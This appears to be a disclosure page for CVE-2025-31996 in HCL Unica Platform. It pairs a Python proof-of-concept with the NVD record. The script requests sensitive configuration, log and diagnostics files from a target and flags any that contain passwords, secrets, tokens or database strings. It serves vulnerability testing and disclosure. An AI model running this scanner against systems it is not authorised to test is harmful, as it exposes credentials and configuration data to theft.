CVE-2025-31996

# CVE-2025-31996 - HCL Unica Platform Unprotected Files PoC # Vulnerability: Improper Access Controls leading to Information Disclosure # CVSS: 5.3 (MEDIUM) - AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-unica-platform.com" # Common unprotected file paths in HCL Unica Platform SENSITIVE_PATHS = [ "/<platform_path>/logs/system.log", "/<platform_path>/conf/platform.properties", "/<platform_path>/WEB-INF/web.xml", "/<platform_path>/unica/WEB-INF/classes/config.properties", "/<platform_path>/status", "/<platform_path>/diagnostics/systemInfo.jsp", "/<platform_path>/health", ] def check_unprotected_files(base_url): """Check for unprotected sensitive files on HCL Unica Platform""" print(f"[*] Target: {base_url}") print(f"[*] Testing for CVE-2025-31996 - Unprotected Files\n") for path in SENSITIVE_PATHS: url = base_url.rstrip('/') + path try: response = requests.get(url, timeout=10, verify=False, allow_redirects=False) if response.status_code == 200 and len(response.content) > 0: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Size: {len(response.content)} bytes") # Check for sensitive content patterns content_lower = response.text.lower() sensitive_patterns = ['password', 'secret', 'key', 'token', 'credential', 'database', 'jdbc'] for pattern in sensitive_patterns: if pattern in content_lower: print(f" [!] Contains sensitive keyword: {pattern}") break elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} (Status: {response.status_code})") else: print(f"[?] Unexpected: {url} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[ERROR] {url}: {str(e)}") if __name__ == "__main__": check_unprotected_files(TARGET_URL)

{"cve": {"id": "CVE-2025-31996", "sourceIdentifier": "[email protected]", "published": "2025-10-13T04:15:56.120", "lastModified": "2025-10-21T14:55:23.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Unica Platform is affected by unprotected files due to improper access controls.  These files may contain sensitive information such as private or system information that can be exploited by attackers to compromise the application, infrastructure, or users."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:unica:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.1.0.1", "matchCriteriaId": "B3EA8F8F-657C-42BF-8415-F787BA65B853"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124418", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}